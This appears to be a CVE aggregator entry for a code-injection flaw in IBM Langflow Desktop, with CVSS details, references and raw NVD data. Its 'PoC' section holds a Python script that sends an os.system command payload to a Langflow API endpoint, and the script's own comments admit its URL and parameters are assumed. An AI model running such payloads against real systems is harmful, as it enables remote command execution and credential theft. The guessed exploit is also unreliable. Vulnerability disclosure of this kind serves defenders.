CVE-2026-6543

Description

IBM Langflow Desktop 1.0.0 through 1.8.4 Langflow allows an attacker to execute arbitrary commands with the privileges of the process running Langflow. This allows reading sensitive environment variables (API keys, DB credentials), modifying files, or launching further attacks on the internal network.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:* - VULNERABLE

IBM Langflow Desktop 1.0.0

IBM Langflow Desktop 1.8.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# Target URL (Example)
target_url = "http://localhost:3000/api/v1/process"

# Malicious payload attempting to execute OS commands
# Assuming the application takes a 'command' or 'code' parameter
data = {
    "flow": {
        "nodes": [
            {
                "id": "1",
                "type": "PythonFunction",
                "data": {
                    # Payload to execute 'id' command via os.system
                    "code": "import os; os.system('id')"
                }
            }
        ]
    }
}

headers = {"Content-Type": "application/json"}

try:
    response = requests.post(target_url, data=json.dumps(data), headers=headers)
    print(f"Status Code: {response.status_code}")
    print("Response Body:")
    print(response.text)
except Exception as e:
    print(f"An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6543
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6543
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6543/
[4] VulDB https://vuldb.com/cve/CVE-2026-6543
[5] https://www.ibm.com/support/pages/node/7271092

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6543", "sourceIdentifier": "[email protected]", "published": "2026-04-30T22:16:26.467", "lastModified": "2026-05-11T17:04:58.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Langflow Desktop 1.0.0 through 1.8.4 Langflow allows an attacker to execute arbitrary commands with the privileges of the process running Langflow. This allows reading sensitive environment variables (API keys, DB credentials), modifying files, or launching further attacks on the internal network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndIncluding": "1.8.4", "matchCriteriaId": "83CB6A3F-0146-4A7A-9FDF-7F49CCBBC143"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7271092", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}